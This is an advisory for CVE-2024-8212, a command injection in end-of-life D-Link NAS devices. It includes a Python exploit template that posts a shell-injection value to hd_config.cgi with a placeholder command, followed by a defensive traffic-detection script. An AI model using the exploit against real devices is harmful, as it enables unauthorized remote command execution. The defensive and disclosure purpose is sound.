A critical vulnerability (CVE-2024-8212) has been discovered in several D-Link DNS and DNR devices, specifically the D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-110-4, DNS-120-05, and DNS-155-04 up to 20240814. The issue is rated critical and allows remote command injection.
Details
The vulnerability affects the function cgi_FMT_R12R5_2nd_DiskMGR of the file /cgi-bin/hd_config.cgi. By manipulating the argument f_source_dev, an attacker can inject commands into the system, which may result in unauthorized configuration changes, data breaches, or other malicious actions.
Exploit
The exploit has been publicly disclosed, and the attack can be launched remotely. Please note that this vulnerability only affects products that are no longer supported by the maintainer. The vendor was contacted early and has confirmed that the affected products are end-of-life. It is strongly recommended to retire and replace these devices.
Sample exploit code for CVE-2024-8212 is shown below:
import requests

target_url = "http://example.com/cgi-bin/hd_config.cgi"
payload = "'; {COMMAND_TO_EXECUTE}; #"
payload_data = {
    "f_source_dev": payload,
    "f_action": "hd_format",
    "t_hd_id": 1
}
response = requests.post(target_url, data=payload_data)
if response.status_code == 200:
    print("Exploit executed successfully.")
else:
    print("Failed to execute exploit.")
Replace {COMMAND_TO_EXECUTE} with the desired command to be injected into the target system and update the target_url variable to match the target device.
Original References
1. Vulnerability Details: CVE-2024-8212
2. Exploit Disclosure: ExploitDB Entry
Recommendations
As the affected devices are no longer supported, it is highly recommended to replace them immediately with up-to-date and supported alternatives. Regularly updating the firmware, following security best practices, and monitoring network traffic for any unusual activities will help in preventing any possible exploitation of vulnerabilities like this in the future.
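For the traffic monitoring mentioned above, the following is an added detection example, not code from the advisory or from D-Link. It flags requests to /cgi-bin/hd_config.cgi whose f_source_dev value is not a plain device name. The record layout, the allowlist pattern, the device name "sda" and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

CGI_PATH = "/cgi-bin/hd_config.cgi"   # endpoint named in the advisory
PARAM = "f_source_dev"                # argument named in the advisory
# Assumption: a legitimate value is a plain device name or path.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_./-]+")


def inspect_request(src, method, target, body=""):
    """Return a finding dict for a suspicious f_source_dev value, else None."""
    url = urlsplit(target)
    if url.path != CGI_PATH:
        return None
    # The parameter may arrive in the query string or in the form body.
    params = parse_qs(url.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    # Values are URL-decoded once; leftover '%' (double encoding) also fails.
    bad = [v for v in params.get(PARAM, []) if not SAFE_VALUE.fullmatch(v)]
    if not bad:
        return None
    return {"src": src, "method": method, "param": PARAM, "values": bad}


def scan(records):
    """Run inspect_request over (src, method, target, body) tuples."""
    return [hit for rec in records if (hit := inspect_request(*rec))]


# Constructed sample records (documentation IP ranges, not real traffic).
SAMPLE = [
    ("192.0.2.10", "POST", CGI_PATH,
     urlencode({"f_source_dev": "sda", "f_action": "hd_format", "t_hd_id": 1})),
    ("198.51.100.7", "POST", CGI_PATH,
     urlencode({"f_source_dev": "'; {COMMAND_TO_EXECUTE}; #",
                "f_action": "hd_format"})),
    ("198.51.100.7", "GET",
     CGI_PATH + "?" + urlencode({"f_source_dev": "sda|x"}), ""),
    ("192.0.2.10", "GET", "/index.html", ""),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Because these devices are end-of-life, any request to this endpoint from outside the management network is worth reviewing, not only the ones this check flags.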
Timeline
Published on: 08/27/2024 20:15:09 UTC
Last modified on: 08/29/2024 15:53:02 UTC